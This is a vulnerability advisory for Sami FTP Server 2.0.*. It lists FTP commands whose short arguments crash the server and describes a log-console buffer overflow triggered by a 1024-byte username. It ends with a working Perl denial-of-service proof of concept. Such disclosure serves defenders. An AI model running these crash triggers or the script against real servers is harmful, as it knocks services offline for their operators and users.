SecurityReason - Sami FTP Server 2.0.* Multiple Remote Vulnerabilities

Advisory Text :

########################################################################
###########################################

# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities

#

# Bugs :

#

# 1)Multiples remote denial of service
(CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)

#

# 2)Remote Buffer overflow (Logs)

#

# Remote Denial of service:

# APPE A => server gone

#

# CWD AA => server gone

#

# DELE AA ==> server gone

#

# MKD AA ==> server gone

#

# RMD AA ==> server gone

#

# RETR AA ==> server gone

#

# RNFR AA ==> server gone

#

# RNTO AA ==> server gone

#

# SIZE AA ==> server gone

#

# STOR AA ==> server gone

#

#

# Buffer Overflow :

# In the console management,you can view your logs,and set some stuff,when
you open the console management a

# buffer overflow occurs ,if you have send previously a request(no matter
the command) with 1024 bytes to the server.

# Also explorer.exe crash at the same time, 2 in 1 ;] The file is
called(SamyFtp.binlog)note that this bug is

# quite critical , because it will occurs all the time,when you open the
console management,and you dont need to be loggued

# you can simply send a username with 1024 bytes ...

#

#

# @nolife: Life is always better when you dont know. things are clearer
also smile

#

#

#

# Denial of service Poc

#

#

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "anonymous";

my $pass = "something";

print "Trying to connect to :$target...\n";

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect";

print "Connected!\n";

$ftp->login($user, $pass);

$ftp->cwd("AA");

print "Poc Successfull the server should down now \n";

$ftp->quit;